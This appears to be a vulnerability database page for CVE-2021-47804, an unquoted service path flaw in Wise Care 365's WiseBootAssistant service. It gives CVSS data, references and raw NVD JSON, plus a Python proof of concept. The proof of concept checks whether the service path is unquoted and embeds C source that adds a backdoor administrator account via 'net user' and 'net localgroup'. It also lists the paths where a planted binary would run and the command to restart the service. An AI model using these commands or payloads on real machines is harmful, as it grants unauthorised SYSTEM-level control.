CVE-2021-47804

Description

Wise Care 365 5.6.7.568 contains an unquoted service path vulnerability in the WiseBootAssistant service running with LocalSystem privileges. Attackers can exploit this by inserting a malicious executable in the service path, which will execute with elevated system privileges when the service restarts.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Wise Care 365 5.6.7.568 及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2021-47804 PoC - WiseBootAssistant Unquoted Service Path
# Author: Security Researcher
# Target: Wise Care 365 5.6.7.568 WiseBootAssistant Service

import os
import sys
import subprocess
import shutil

def check_vulnerable_service():
    """Check if WiseBootAssistant service exists and is vulnerable"""
    try:
        result = subprocess.run(
            ['sc', 'qc', 'WiseBootAssistant'],
            capture_output=True,
            text=True
        )
        if result.returncode == 0:
            output = result.stdout
            if 'BINARY_PATH_NAME' in output:
                print("[+] WiseBootAssistant service found")
                # Check if path is unquoted
                if '"' not in output.split('BINARY_PATH_NAME')[1].split('\n')[0]:
                    print("[!] Service path is UNQUOTED - VULNERABLE")
                    return True
                else:
                    print("[-] Service path is properly quoted")
                    return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
    return False

def create_malicious_executable():
    """Generate malicious executable to escalate privileges"""
    malicious_code = '''
#include <windows.h>
#include <stdio.h>

int main() {
    printf("[+] Malicious payload executed with SYSTEM privileges\\n");
    
    // Add your malicious code here
    // Example: Create admin user or execute reverse shell
    
    // Create a new admin user
    system("net user Attacker P@ssw0rd123 /add");
    system("net localgroup Administrators Attacker /add");
    
    return 0;
}
'''
    return malicious_code

def exploit_unquoted_path():
    """Exploit unquoted service path vulnerability"""
    print("[*] CVE-2021-47804 Exploitation Script")
    print("[*] Target: Wise Care 365 WiseBootAssistant Service\n")
    
    # Check if vulnerable
    if not check_vulnerable_service():
        print("[-] Target is not vulnerable or service not found")
        return False
    
    # Determine exploitable path
    service_path = r"C:\Program Files\Wise Care 365\WiseBootAssistant.exe"
    exploitable_paths = [
        r"C:\Program.exe",
        r"C:\Program Files\Wise.exe"
    ]
    
    print("\n[*] Identified exploitable paths:")
    for path in exploitable_paths:
        print(f"  - {path}")
    
    print("\n[!] To exploit:")
    print("1. Place malicious executable at one of the paths above")
    print("2. Wait for service restart or trigger manually:")
    print("   sc stop WiseBootAssistant && sc start WiseBootAssistant")
    print("3. Malicious code will execute with SYSTEM privileges")
    
    return True

if __name__ == "__main__":
    exploit_unquoted_path()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47804
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47804
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47804/
[4] VulDB https://vuldb.com/cve/CVE-2021-47804
[5] https://www.exploit-db.com/exploits/50038
[6] https://www.vulncheck.com/advisories/wise-care-wisebootassistant-unquoted-service-path
[7] https://www.wisecleaner.com/wise-care-365.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47804", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:24.903", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wise Care 365 5.6.7.568 contains an unquoted service path vulnerability in the WiseBootAssistant service running with LocalSystem privileges. Attackers can exploit this by inserting a malicious executable in the service path, which will execute with elevated system privileges when the service restarts."}, {"lang": "es", "value": "Wise Care 365 5.6.7.568 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio WiseBootAssistant que se ejecuta con privilegios de LocalSystem. Los atacantes pueden explotar esto insertando un ejecutable malicioso en la ruta del servicio, el cual se ejecutará con privilegios de sistema elevados cuando el servicio se reinicie."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50038", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wise-care-wisebootassistant-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.wisecleaner.com/wise-care-365.html", "source": "[email protected]"}]}}